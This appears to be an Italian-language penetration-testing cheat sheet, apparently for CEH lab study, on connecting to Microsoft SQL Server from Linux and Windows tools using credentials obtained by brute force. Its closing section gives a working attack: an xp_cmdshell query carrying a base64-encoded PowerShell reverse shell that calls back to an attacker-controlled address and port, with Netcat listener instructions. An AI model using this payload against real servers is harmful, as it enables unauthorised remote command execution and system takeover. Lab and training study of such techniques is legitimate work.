tags: Connessione_MSSQL Linux Windows MSSQL database


Linux

Impacket

python3 /root/impacket/examples/mssqlclient.py CEH.com/<username>:<password>@10.10.1.30 -port 1433

TSQL

sudo apt update
sudo apt install freetds-bin freetds-common
tsql -H IP_o_Hostname -p 1433 -U username -P password
#esempio 
tsql -H 192.168.1.10 -p 1433 -U admin -P Password123!

SQSH

sudo apt update 
sudo apt install sqsh
sqsh -S <IP_SERVER>[:<PORTA>] -U <USERNAME> -P '<PASSWORD>'
sqsh -S 10.10.0.5:1433 -U sa -P 'P@$$wOrd123!'

Windows

MSSM

Microsoft SQL Server Management è uno strumento con interfaccia grafica che ci permette di connetterci ad un server Microsoft SQL, lo possiamo scaricare dal sito ufficiale e una volta installato e avviato possiamo connetterci mettendo:

CampoCosa mettere
Server nameL’indirizzo IP del server MSSQL (es. 192.168.1.10)
AuthenticationSQL Server Authentication
LoginIl nome utente trovato (es. sa)
PasswordLa password trovata tramite brute-force

Ricordati anche di cliccare sulla flag Trust server certificate in fondo alla pagina.

Reverse Shell

Tramite MSSM possiamo generare delle query che ci permetto di ottenere una reverse shell, per farlo possiamo cliccare con il tasto destro sull’iconcina del database e cliccare su New Query. Una volta aperta la sezione query possiamo provare tramite il comando xp_cmdshell a generare una reverse shell come nel seguente esempio:

Per prima cosa ci generiamo una reverse shell powershell (quella base64 è la migliore) tramite https://www.revshells.com/ poi ci mettiamo in ascolto tramite Netcat (puoi anche utilizzare Linux) alla porta stabilita e ci connettiamo tramite la seguente query da lanciare con MSSM:

EXEC xp_cmdshell 'powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQA5ADIALgAxADYAOAAuADEALgAyADEAMAAiACwAOQAwADAAMQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=';